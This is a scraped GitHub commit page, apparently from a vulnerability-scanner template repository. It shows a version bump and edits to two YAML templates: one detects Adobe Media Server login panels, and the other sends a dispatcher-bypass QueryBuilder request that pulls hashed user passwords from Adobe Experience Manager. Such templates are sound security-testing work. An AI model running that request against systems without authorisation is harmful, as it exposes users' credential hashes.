-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
c815775
commit 4bdd1ad
Showing
1,544 changed files
with
22,391 additions
and
13,026 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20240921 | ||
20240922 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,23 +1,30 @@ | ||
id: adobe-media-server | ||
|
||
info: | ||
name: Adobe Media Server | ||
author: dhiyaneshDK | ||
severity: info | ||
reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 | ||
tags: panel,adobe | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '<title>Adobe Media Server</title>' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
id: adobe-media-server | ||
|
||
info: | ||
name: Adobe Media Server Login Panel | ||
author: dhiyaneshDK | ||
severity: info | ||
description: An Adobe Media Server login panel was detected. | ||
reference: | ||
- https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 | ||
- https://helpx.adobe.com/support/adobe-media-server.html | ||
classification: | ||
cwe-id: CWE-200 | ||
tags: panel,adobe | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '<title>Adobe Media Server</title>' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/03/20 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,32 +1,26 @@ | ||
id: aem-hash-querybuilder | ||
|
||
info: | ||
author: DhiyaneshDk | ||
name: Query hashed password via QueryBuilder Servlet | ||
author: DhiyaneshDk | ||
severity: medium | ||
reference: https://twitter.com/AEMSecurity/status/1372392101829349376 | ||
reference: | ||
- https://twitter.com/AEMSecurity/status/1372392101829349376 | ||
tags: aem | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | ||
Accept-Language: en-US,en;q=0.5 | ||
Accept-Encoding: gzip, deflate | ||
Connection: close | ||
Upgrade-Insecure-Requests: 1 | ||
Cache-Control: max-age=0 | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- '"success":true' | ||
- 'rep:password' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.